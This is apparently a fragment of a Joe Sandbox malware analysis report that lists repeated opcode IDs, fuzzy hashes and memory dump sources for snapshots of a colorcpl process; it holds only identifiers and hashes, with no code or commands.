                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2f8be1035c34cdd362023a6c25278f57d5c15ef94f6876b80998da1a059ca60c
                                                                                                                                          • Instruction ID: c7dde5ef7fc190eabc2a3a68ab5b0947138ba42db54055c98987bcd87f231e27
                                                                                                                                          • Opcode Fuzzy Hash: 2f8be1035c34cdd362023a6c25278f57d5c15ef94f6876b80998da1a059ca60c
                                                                                                                                          • Instruction Fuzzy Hash: 93C15874108381CFD764CF15C594BABB7E5BF88304F404A6DE98997291D775EA08CFA2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e5b2605f566e37ef8823acb4f730458d89f6fd811caa3b371021d416b05c7e57
                                                                                                                                          • Instruction ID: 7c7df0cf85848426732513b497ae5adb67034e3bfd1bd9535b425e7f4ccd6b74
                                                                                                                                          • Opcode Fuzzy Hash: e5b2605f566e37ef8823acb4f730458d89f6fd811caa3b371021d416b05c7e57
                                                                                                                                          • Instruction Fuzzy Hash: C1B17F70A083658BDB25CF64C990BA9B3B1EF44704F1085EDD50AEB281EB74DE85DB21
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8f5df0e2ddcc62e2bf2d7daaa5abf24c8e96ee8604da25c3b5942e42bb4b2fab
                                                                                                                                          • Instruction ID: 91f4a91920e2c22082765fb10d8588d22b5725b7bf08dd8cb64978f0ada15319
                                                                                                                                          • Opcode Fuzzy Hash: 8f5df0e2ddcc62e2bf2d7daaa5abf24c8e96ee8604da25c3b5942e42bb4b2fab
                                                                                                                                          • Instruction Fuzzy Hash: 3EA1F231E097599FDB128B64C948F9E7BB4AB01764F410265EB10AB2D1DF789E40CB93
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b73f62b41e9df34acbebe36432582590d4a6a21c48000ef35aeeb6dbbe19ce41
                                                                                                                                          • Instruction ID: 50937f0c711af3f733478ec628b025287654891d7bdb4ae099a1a2c182fc7149
                                                                                                                                          • Opcode Fuzzy Hash: b73f62b41e9df34acbebe36432582590d4a6a21c48000ef35aeeb6dbbe19ce41
                                                                                                                                          • Instruction Fuzzy Hash: 08A1BD71A09716DFEB25CF65CA90BBAB7B1FF54314F104129EE05A7281EB34E911CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6b198f50a34c16ea94697bf7325aa5cd5060574c15825ae6ffd20bad3c13fe46
                                                                                                                                          • Instruction ID: 5ffa9ac13a62a5cf4a3e9c65c95ec9e205c6f3c78ced8962b48d629d4b6bdf15
                                                                                                                                          • Opcode Fuzzy Hash: 6b198f50a34c16ea94697bf7325aa5cd5060574c15825ae6ffd20bad3c13fe46
                                                                                                                                          • Instruction Fuzzy Hash: ADA19972A0D751AFC712CF24CA90B5AB7E9FF58714F410A38E6899B792D334E940CB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                          • Instruction ID: 93e1eaf0ea1cd2388a5a376e3df5572c1dca96149ad95c72b74be99e776c59ba
                                                                                                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                          • Instruction Fuzzy Hash: F1B15871E0871ADFCB18CFA9C980BADB7B5FF58304F10816AE914AB351D770A941CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 18169d23de2d04b929603bb2b371c8a0bd6aeb776da8dcb0f124aa2685cbe1e6
                                                                                                                                          • Instruction ID: 15b20ab457c4d608ee0cf759657a5e8b4e6201c308ac63985dc7375329feace7
                                                                                                                                          • Opcode Fuzzy Hash: 18169d23de2d04b929603bb2b371c8a0bd6aeb776da8dcb0f124aa2685cbe1e6
                                                                                                                                          • Instruction Fuzzy Hash: 21916271E08315AFDF15CFA4D8A4BAFBBB5AF48724F114269E610AB381D734D901DBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 39308392bd4141a0e3fcabe48c0be8509dd3b011506b3d9722155ba4650aec72
                                                                                                                                          • Instruction ID: 92245f42805ed5ff4c0827760dadb244e6385c5f90a944dfff9a656f8118eee7
                                                                                                                                          • Opcode Fuzzy Hash: 39308392bd4141a0e3fcabe48c0be8509dd3b011506b3d9722155ba4650aec72
                                                                                                                                          • Instruction Fuzzy Hash: 25912432A08725DBD722CF68C988B6A77A1EF98724F014165ED44EB382E634DD41CB92
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 45b7d6ba92b8eb0afc9d2bdfc9756f0ad05a448253c1b418d513ee70c81599d1
                                                                                                                                          • Instruction ID: 730205695b40d5ce359fb96105af480af25d50e7f50ffffbcd1bed86eff2b489
                                                                                                                                          • Opcode Fuzzy Hash: 45b7d6ba92b8eb0afc9d2bdfc9756f0ad05a448253c1b418d513ee70c81599d1
                                                                                                                                          • Instruction Fuzzy Hash: 8181A1B1A047159BDF14CF69C990ABEBBF5FB48700F10852EE945E7645E334E940CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                          • Instruction ID: ffc8e316261b4b1bdceb068e244a95d7560f4f568579e72c4097c11e77167478
                                                                                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                          • Instruction Fuzzy Hash: 4B819431A043099FCF19CF99C990AAEB7F2FF84314F148569D91AAB355DB78DA01CB60
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 03ec5b8541cd2a27f5fdcba9810c24f765b143e8cb2a3debf4d9664899a31ee4
                                                                                                                                          • Instruction ID: 6fdfbe7d5cd0cc811b73a36951bc49a1a33dbbaaeb0fc7f95a6132a5bf70d86c
                                                                                                                                          • Opcode Fuzzy Hash: 03ec5b8541cd2a27f5fdcba9810c24f765b143e8cb2a3debf4d9664899a31ee4
                                                                                                                                          • Instruction Fuzzy Hash: 12518D71905325EFCB10CFA9C9A0A9EBBB9FF48328B504A19D946A7345D734EE01CF90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 017594796f5b1dfd20ef0832443e26e407bc576295dce593d2274a7e50906782
                                                                                                                                          • Instruction ID: dc1615ee26d80d686527fbd8a862c34f8e59e598311d4432f0e468fd5f028e82
                                                                                                                                          • Opcode Fuzzy Hash: 017594796f5b1dfd20ef0832443e26e407bc576295dce593d2274a7e50906782
                                                                                                                                          • Instruction Fuzzy Hash: DA413931B4C3519BDB2ADF699984F2AB764EB58304F40053CEE16AB2C1D7B9D914C750
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                          • Instruction ID: 1c61d124b433dfc408ae92adf12385836445fc585bbb91212fb7ddbb2ab2fee3
                                                                                                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                          • Instruction Fuzzy Hash: 03411772A097169FC715CF24C984A6BB3E9FF90314B05466EE91B8B641EB34ED08C7E4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6c5bfd884391f47e58a031061e2820a99a1749eaa0cf95103647a4f892b5ed6c
                                                                                                                                          • Instruction ID: a754d64cbed83536e52c9bca93dd76dcc2ed2750621eb7b33a8b608e4937d19a
                                                                                                                                          • Opcode Fuzzy Hash: 6c5bfd884391f47e58a031061e2820a99a1749eaa0cf95103647a4f892b5ed6c
                                                                                                                                          • Instruction Fuzzy Hash: 36417436A093299BCB05CFA8C540BEEF7B4AF4C714F50826EE915BB240E7359D51CBA4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 71586252befe7464a79152c8619d3bc45bbc3c8ae60d5ba27ffd5f815e73ca5e
                                                                                                                                          • Instruction ID: 3ac4dd7cae3f5bfb4f6e03b4c22fda9e7c23a66ef1aa569af64156c83a139242
                                                                                                                                          • Opcode Fuzzy Hash: 71586252befe7464a79152c8619d3bc45bbc3c8ae60d5ba27ffd5f815e73ca5e
                                                                                                                                          • Instruction Fuzzy Hash: 3941C172A083018FD712CF25C884A1BB7F5FF98328F404969EA56C7252EF74E944CB52
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                          • Instruction ID: bfc8c716d755be8c291708477fcf3f7e1beb6c2e934097f8017274a2d307f1eb
                                                                                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                          • Instruction Fuzzy Hash: E4517875A05719CFCB00CF99C580AAEF7B2FF85714F2481A9D915AB351D734AE82CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 735691a27d25314d38abf9699085a576668601f44f760a6b838158f79aa79bbe
                                                                                                                                          • Instruction ID: 1914fcbd5c5a6f2bdedad4df4ec2750ff4c1fd49e19dab8b6dde6c3da4106a76
                                                                                                                                          • Opcode Fuzzy Hash: 735691a27d25314d38abf9699085a576668601f44f760a6b838158f79aa79bbe
                                                                                                                                          • Instruction Fuzzy Hash: 51512570908716CBDB168B24CD44BE9B7F1EF21318F1083AAD529A72D1E774AD81CF81
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3de05a38a916a9d33233260171faedf3f081928f7ee6bb38627d5b9474bb1f79
                                                                                                                                          • Instruction ID: a6b0a99ff3d3643a642405733de961eb32b6ae795cc7e010de63b651532334f3
                                                                                                                                          • Opcode Fuzzy Hash: 3de05a38a916a9d33233260171faedf3f081928f7ee6bb38627d5b9474bb1f79
                                                                                                                                          • Instruction Fuzzy Hash: 8741DF71A097289BCB22CF29C944BDA77B8EF59740F0101A5E908AB241DB34DE84CFA1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                          • Instruction ID: c1872e3584ca32955b26869088360fa7821c09d5bd4dee1295f4d8215be19970
                                                                                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                          • Instruction Fuzzy Hash: FB41D775B14305ABDB05CF95CD85AAFBBBAAF88344F5040A9E919E7362DA70DE00C770
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b204051493ed3b22cb59f65d1c9ff73db916541eb8cb82a4e148f57ad5f4fb8c
                                                                                                                                          • Instruction ID: 1c5ec1557cb0bb58530769faaabe8942e7a61dfc1ebef25caed8f1e2b5d05cb2
                                                                                                                                          • Opcode Fuzzy Hash: b204051493ed3b22cb59f65d1c9ff73db916541eb8cb82a4e148f57ad5f4fb8c
                                                                                                                                          • Instruction Fuzzy Hash: E141D1B1608B019FD326CF24C580A22B7F9FF69318B508B6DE58797A55E730F945CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b51b6fedcae96530b995d6d22bf7cc0a8db879a536faa3d2c06b97502c177380
                                                                                                                                          • Instruction ID: 60ea7cc505070b88622e1518803d42ccfd4cb74537ae6621998f18d030d4e349
                                                                                                                                          • Opcode Fuzzy Hash: b51b6fedcae96530b995d6d22bf7cc0a8db879a536faa3d2c06b97502c177380
                                                                                                                                          • Instruction Fuzzy Hash: 92418B32E49314CFCB05CF68CAA0BADB7B0BB58354F5406A5E811BB2D5DB38D940DBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5f22279f897ed0ea81c3f560e42abfe16f022fe1dbbd2fa35b1d818db456be64
                                                                                                                                          • Instruction ID: a8f21c83692dbf70cb8a1a7ffc99eb9f9df742b158cfa0eb0f8bd14c80e15fe8
                                                                                                                                          • Opcode Fuzzy Hash: 5f22279f897ed0ea81c3f560e42abfe16f022fe1dbbd2fa35b1d818db456be64
                                                                                                                                          • Instruction Fuzzy Hash: 2541497190A701CBC715CF59C980B5A77B2FFA8714F90862AD9016BB95C77ADC81CFA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1b1ea990bc6fef7f407a182296f24309c2cef36e4ee629f54da29385949dc65a
                                                                                                                                          • Instruction ID: fce1d25fd27d95c08a37bb48198ccd78f00312820ee8474fb63f823d549174b8
                                                                                                                                          • Opcode Fuzzy Hash: 1b1ea990bc6fef7f407a182296f24309c2cef36e4ee629f54da29385949dc65a
                                                                                                                                          • Instruction Fuzzy Hash: 38412B7150D7469EE312CF648944A5BB6E9AF88B54F80092AF994D7250E730CE45CBD3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ec0f2a9abae7c6397e03771969e6f746a8ee7489b64aeab5b6205f0b85ae3264
                                                                                                                                          • Instruction ID: 75a6593d86b9474a3390be291e177fb64fc98414b8a40a30034624177a1b3679
                                                                                                                                          • Opcode Fuzzy Hash: ec0f2a9abae7c6397e03771969e6f746a8ee7489b64aeab5b6205f0b85ae3264
                                                                                                                                          • Instruction Fuzzy Hash: AB31D075A04319ABDB15CF98C940BAEB7B9EB48B44F414168E905EB286D770ED00CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7d3898429215c261ce9fabe52d742c2c7f35d5ac1936ad867467f46d84cfb982
                                                                                                                                          • Instruction ID: 890c91612462d6f4ac2a49da18d402d636591d12fa0651620aea1c5835588aa8
                                                                                                                                          • Opcode Fuzzy Hash: 7d3898429215c261ce9fabe52d742c2c7f35d5ac1936ad867467f46d84cfb982
                                                                                                                                          • Instruction Fuzzy Hash: 1B31AD32E09718AFCB22CEA98D40E9FBBF8EB08760F014565E915E7250DA749E00DB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 30a9b60e88f77eac1afa8d6c6e01f6de1a8890303bef31b18eae871d21e2ae22
                                                                                                                                          • Instruction ID: cab35de99ac2cac71dd2dd42353ef5ba21932c9d8f3af7c983010946a2ae29a2
                                                                                                                                          • Opcode Fuzzy Hash: 30a9b60e88f77eac1afa8d6c6e01f6de1a8890303bef31b18eae871d21e2ae22
                                                                                                                                          • Instruction Fuzzy Hash: F2316576A4522CABCB22DF64DD98BDE77F5BB98310F1101E5E508A7250CB30DE918F90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7181adf7bbcf6f1306542a25349257d017f1dcdf22281c61b34fac3a52a992c2
                                                                                                                                          • Instruction ID: f543d06770176698bc0376bcc3ccfa59e6e89657b016bba4cf6c8aebf06f02c9
                                                                                                                                          • Opcode Fuzzy Hash: 7181adf7bbcf6f1306542a25349257d017f1dcdf22281c61b34fac3a52a992c2
                                                                                                                                          • Instruction Fuzzy Hash: 1131BF72A08715EBD7138FA9C850F5ABBA9AF54754F04406DE50AEB383DA70DD018BA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d590f842b829ec71430105f182db8f90d616ccacfd873f565e530b7966011bd7
                                                                                                                                          • Instruction ID: 642606dff6f7081f7374ef3c7170e44eda50cdf989d5fb28abba4641e61ba633
                                                                                                                                          • Opcode Fuzzy Hash: d590f842b829ec71430105f182db8f90d616ccacfd873f565e530b7966011bd7
                                                                                                                                          • Instruction Fuzzy Hash: DB31D176A0DB51DBC712CE248885E5B7BB5AFA4360F024629FD55AB314DA30DC01D7F2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c2de713d0565526f8be6015705e1addb84734fc94c040935ea59dd84ee4aa8e3
                                                                                                                                          • Instruction ID: 419bfb8f1158d406a3d91c1c9c0379281e86468f49e80f38bc045f30be03499b
                                                                                                                                          • Opcode Fuzzy Hash: c2de713d0565526f8be6015705e1addb84734fc94c040935ea59dd84ee4aa8e3
                                                                                                                                          • Instruction Fuzzy Hash: 2931BA7260D7518FD310CF19C940B1AB7E9FB98704F404A6EE9849B350D7B1EC04CBA2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                          • Instruction ID: 1757a397b1f56ce328656317307b878ca29a4b92be7b2b3307a2c939758318b0
                                                                                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                          • Instruction Fuzzy Hash: 3B312972B08B01AFD761CF69DE41B57B7F8BB08B54F04093DA99AD3651E634E904CB60
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dac6fecc5ca08333038c31f0ba5fb6946b410d033f0096a22b6489f2f823be4b
                                                                                                                                          • Instruction ID: 0c64bb1c3a320ed700a623c5664b33ba50f98b51402037dcd0f08069e7b47e56
                                                                                                                                          • Opcode Fuzzy Hash: dac6fecc5ca08333038c31f0ba5fb6946b410d033f0096a22b6489f2f823be4b
                                                                                                                                          • Instruction Fuzzy Hash: 02315A7150A341CFC712CF29C68094ABBF1FF99318F4449AAE4889B296D331EE45CB92
                                                                                                                                          Memory Dump Source
